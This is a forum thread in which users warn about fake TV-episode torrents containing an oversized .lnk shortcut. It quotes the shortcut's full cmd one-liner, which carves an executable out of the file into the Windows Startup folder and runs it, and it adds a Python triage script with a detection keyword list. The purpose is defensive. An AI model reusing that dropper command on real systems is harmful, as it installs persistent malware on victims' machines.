I have Sonarr and Radarr set up to keep me up to date on some TV shows. Lately I’ve gotten a handful of files that Sonarr refuses to import because of a .lnk file. The download consists of a folder with the name of the file I want. Inside the folder is a file with the same name, and a .lnk extension. The .lnk file is very big (950MB), and programmed to run this script:
%ComSpec% /v:On/CSET el=Severance.S02E07.1080p.WEB.H264-SuccessfulCrab.mkv&SET c=“%Appdata%\microsoft\windows\START MENU\PROGRAMS\STARTUP%Username%.exe”&(If not exist !c! Findstr/v “cmd.EXE Rj%TIME:7,1%%TIME:-2%” !el!.Lnk>!c!&Start “” !c!)&CD %tmp%&Echo.>!
As far as I can tell, this creates an empty executable file in your Windows startup folder, and copies a portion of the fake video file into it. It then runs the malware. And, since it’s in your startup folder, it will run again every time you reboot.
The tracker is theRARBG, but it could also come from elsewhere. I’ve found it on a couple of different shows (not just this one), and they always download a couple of days before the airdate.
Be careful!
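An added example, not from the original post: a small Python triage routine that parses the .lnk structure (header, StringData, ExtraData) to pull out the argument string and measure how much data is appended after the shortcut ends, which is what makes a 950MB shortcut stand out. The sample shortcut it checks is constructed in the code with a harmless echo command; the size threshold and the keyword list are my assumptions.

```python
import struct
# Field layout from the Shell Link Binary File Format (MS-SHLLINK).
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_ID_LIST, HAS_LINK_INFO, HAS_ARGS, IS_UNICODE = 0x01, 0x02, 0x20, 0x80
STRING_FLAGS = (0x04, 0x08, 0x10, 0x20, 0x40)  # Name, RelPath, WorkDir, Args, Icon

def parse_lnk(data):
    """Return (command-line arguments, overlay). The overlay is every byte after the
    ExtraData terminal block; a genuine shortcut has none, a carrier file has lots."""
    if len(data) < 76 or data[:4] != b"\x4c\x00\x00\x00" or data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = 76
    if flags & HAS_ID_LIST:  # LinkTargetIDList: 2-byte size, then the ID list
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:  # LinkInfo: its first dword is the total size
        pos += struct.unpack_from("<I", data, pos)[0]
    strings = {}
    for flag in STRING_FLAGS:  # StringData: 2-byte char count, then the chars
        if flags & flag:
            count = struct.unpack_from("<H", data, pos)[0]
            width = 2 if flags & IS_UNICODE else 1
            raw = data[pos + 2:pos + 2 + count * width]
            strings[flag] = raw.decode("utf-16-le" if width == 2 else "cp1252")
            pos += 2 + count * width
    while pos + 4 <= len(data):  # ExtraData blocks; a size < 4 is the terminator
        size = struct.unpack_from("<I", data, pos)[0]
        pos += max(size, 4)
        if size < 4:
            break
    return strings.get(HAS_ARGS, ""), data[pos:]

def triage_lnk(data, size_limit=1_000_000):
    """List the reasons a shortcut looks like a disguised dropper (empty = clean)."""
    args, overlay = parse_lnk(data)
    reasons = []
    if len(data) > size_limit:  # assumed threshold: real shortcuts are a few KB
        reasons.append(f"shortcut is {len(data)} bytes, far beyond any real .lnk")
    if overlay:
        reasons.append(f"{len(overlay)} bytes appended after the shortcut structure")
    for marker in ("%comspec%", "cmd", "findstr", "startup", "%appdata%"):  # assumed list
        if marker in args.lower():
            reasons.append(f"arguments reference {marker!r}")
    return reasons

def build_sample_lnk(args, overlay=b""):
    """Constructed test artefact: a minimal Unicode shortcut with only an argument string."""
    header = struct.pack("<I", 0x4C) + LNK_CLSID + struct.pack("<I", HAS_ARGS | IS_UNICODE)
    header += bytes(76 - len(header))  # remaining header fields zeroed
    return header + struct.pack("<H", len(args)) + args.encode("utf-16-le") + bytes(4) + overlay
```

Running triage_lnk over every .lnk in a completed-downloads folder gives a cheap pre-import check; anything with an overlay or a %ComSpec% argument string is worth quarantining before Sonarr ever sees it.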
See these all the time, unfortunately. I just add a line in the torrent client to not download anything with that file extension.
I luckily haven’t encountered these yet, but I primarily use NZB.
I’ve been noticing these around. Sonarr catches them and I just delete them and research. I found that it’s often for the next week’s episode of a show, only days after the previous episode came out. So it’s easy to see something that looks suspect anyway.
If there is one that is smaller than 950MB, it would be interesting if you uploaded it to a cloud sandbox analyzer like Any.Run, Triage, or some other similar service.
Thank you for the heads up!
laughs in Linux